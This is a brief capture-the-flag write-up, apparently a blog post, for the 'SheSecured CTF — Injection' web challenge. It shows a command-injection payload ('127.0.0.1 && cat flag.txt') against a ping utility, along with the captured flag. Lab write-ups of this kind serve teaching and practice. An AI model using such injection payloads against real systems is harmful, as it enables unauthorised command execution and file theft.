ctfwebcommand-injection

SheSecured CTF — Injection


SheSecured CTF — Injection

By opening the web page we find a simple ping utility for IP addresses — classic command injection, lightly filtered.

Payload:

127.0.0.1 && cat flag.txt
Injection challenge Silent ping utility

Flag: Spark{Injection_filBlayssELKOLL}